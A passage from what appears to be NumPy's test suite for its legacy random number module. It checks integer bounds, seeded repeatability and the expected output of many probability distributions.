lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
@pytest.mark.skipif(np.iinfo('l').max < 2**32,
reason='Cannot test with 32-bit C long')
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[3992670689, 2438360420, 2557845020],
[4107320065, 4142558326, 3216529513],
[1605979228, 2807061240, 665605495]],
[[3211410639, 4128781000, 457175120],
[1712592594, 1282922662, 3081439808],
[3997822960, 2008322436, 1563495165]],
[[1398375547, 4269260146, 115316740],
[3414372578, 3437564012, 2112038651],
[3572980305, 2260248732, 3908238631]],
[[2561372503, 223155946, 3127879445],
[ 441282060, 3514786552, 2148440361],
[1629275283, 3479737011, 3003195987]],
[[ 412181688, 940383289, 3047321305],
[2978368172, 764731833, 2282559898],
[ 105711276, 720447391, 3596512484]]])
for size in [None, (5, 3, 3)]:
random.seed(12345)
x = self.rfunc([[-1], [0], [1]], [2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.seed(self.seed)
actual = random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.seed(self.seed)
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.seed(self.seed)
actual = random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_randint(self):
random.seed(self.seed)
actual = random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(int).max == 2147483647:
desired = np.array([[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889]], dtype=np.int64)
else:
desired = np.array([[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332]],
dtype=np.int64)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype('l').type
actual = random.random_integers(typer(np.iinfo('l').max),
typer(np.iinfo('l').max))
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
non_contig = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_bytes(self):
random.seed(self.seed)
actual = random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
random.seed(self.seed)
bad_x_str = "abcd"
assert_raises(IndexError, random.permutation, bad_x_str)
random.seed(self.seed)
bad_x_float = 1.2
assert_raises(IndexError, random.permutation, bad_x_float)
integer_val = 10
desired = [9, 0, 8, 5, 1, 3, 4, 7, 6, 2]
random.seed(self.seed)
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, .456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random.seed(self.seed)
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
